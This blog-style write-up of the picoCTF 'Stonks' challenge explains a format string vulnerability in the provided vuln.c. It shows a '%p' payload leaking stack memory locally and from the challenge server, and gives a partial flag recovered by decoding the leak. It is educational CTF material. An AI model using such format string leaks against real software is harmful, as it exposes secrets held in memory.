# PicoCTF: Stonks

[Link to challenge](https://play.picoctf.org/practice/challenge/105)

## Acclimating to a new challenge

Welcome to my journey of diving into CTFs. I have some experience with capture the flag challenges, most of it coming through my experience at the Cyber Schoolhouse in Fort Gordon and the quick rigors of Mantech's CNO course. I'm excited to cut my teeth and learn along the way!

## The Challenge

The first challenge is titled "Stonks" and comes with the tag - binary exploitation. It also includes a short description where a gaudy programmer decides to make an "AI" stock trading program that they "wouldn't believe you if you told me it's unsecure". Attached is a link to <ins>vuln.c</ins> and the command line instruction *nc mercury.picoctf.net 20195*.

## The Solve

### Quick static analysis

My first instinct was to jump into the c file and see what was happening there. What I found was that besides the setup and teardown helpers for a linked list structure there was only only really two functions that main went to and then immediately returned.

```C
    if (resp == 1) {
        buy_stonks(p);
    } else if (resp == 2) {
        view_portfolio(p);
    }
```

### Build and run

Over-eagerly I quickly compiled vuln.c with `gcc vuln.c -o vuln`. If I had taken the half-second to include the -WExtra or -Wall flag it would've pointed me right to the mistake. Running the executable led me right where I wanted to go and I was presented with two options:

```bash What would you like to do? <br> 1) Buy some stonks!<br>2) View my portfolio ```

Some quick trial and error showed that the path forward must be in the first option and therefore `buy_stonks`. There is some setup in the function and the program does need a file called `api` to continue execution (important for testing later) but the interesting part is below:

```c
    char *user_buf = malloc(300 + 1);
    printf("What is your API token?\n");
    scanf("%300s", user_buf);
    printf("Buying stonks with token:\n");
    printf(user_buf);
```

vuln.c takes input from stdin and writes it to a buffer on the heap. Then uses printf on that buffer directly. This allows us to manipulate the abilities of printf in order to conduct a format string attack. This works by setting the buffer to be printed to some string that printf might interpret as format parameters. We can leverage this to print values from the stack including the super secret API key.

### Testing

Now for to test our hypothesis but first we have to create the file `api` for the executable to read the secret key from during our testing. I put a simple string that included some easily recognizable ascii characters: "123456789". After some experimentation I found this.

```text
What would you like to do?
1) Buy some stonks!
2) View my portfolio
1
Using patented AI algorithms to buy stonks
Stonks chosen
What is your API token?
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
Buying stonks with token:
0x7fce38456723(nil)0x7fce3837b1e70x1a0x7fffffff0x7ffc809c6c700x556ad169e2a00x9000000000x556ad169e6d00x556ad169f9800x556ad169f9a00x38373635343332310x7fce384500390xd680xa0x7fce384566a00x556ad146d1510x556ad146f010
Portfolio as of Thu 09 Sep 2021 01:21:38 PM EDT
```

And we can see our string in there, 0x`3837363534333231` 0x7fce384500`39`, and now we're ready to try against the real thing.

### Getting the flag

The real test comes from a server set up on picoct.net. A simple netcat to port 20195 on mercury.picoctf.net connects you to the challenge. You'll be prompted with the familiar two options from before and if you choose 1 and then submit a series of '%p's as your api the program indeed shoots back data from the stack.

```text
What would you like to do?
1) Buy some stonks!
2) View my portfolio
1
Using patented AI algorithms to buy stonks
Stonks chosen
What is your API token?
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
Buying stonks with token:
0x9e223700x804b0000x80489c30xf7ed9d800xffffffff0x10x9e201600xf7ee71100xf7ed9dc7(nil)0x9e211800x20x9e223500x9e223700x6f6369700x7b4654430x306c5f490x345f7435
```

My first instinct was to throw this random data into [CyberChef](https://gchq.github.io/CyberChef/) to try to make some sense of it. I knew that the flag should be ascii and that the endianness would be off because of how we got the data. Selecting those two options and then removing some bad values(nil, obvious memory addresses and ints) we get left with a nice partial string `picoCTF{I_l05t_4`. No worries we just run again this time with more pointers in our api to capture the whole flag.

With a few tweaks to a standard pwntools script, [solution.py](./solution.py), I was able to connect to the server, print the stack, flip around the bytes, and print out the flag.

### Conclusion

Thanks for following along for my first picoCTF. This one was a good learning experience with some good hands on with pwntools and learning about format string vulnerabilities. I will definitely be doing more so stay tuned!
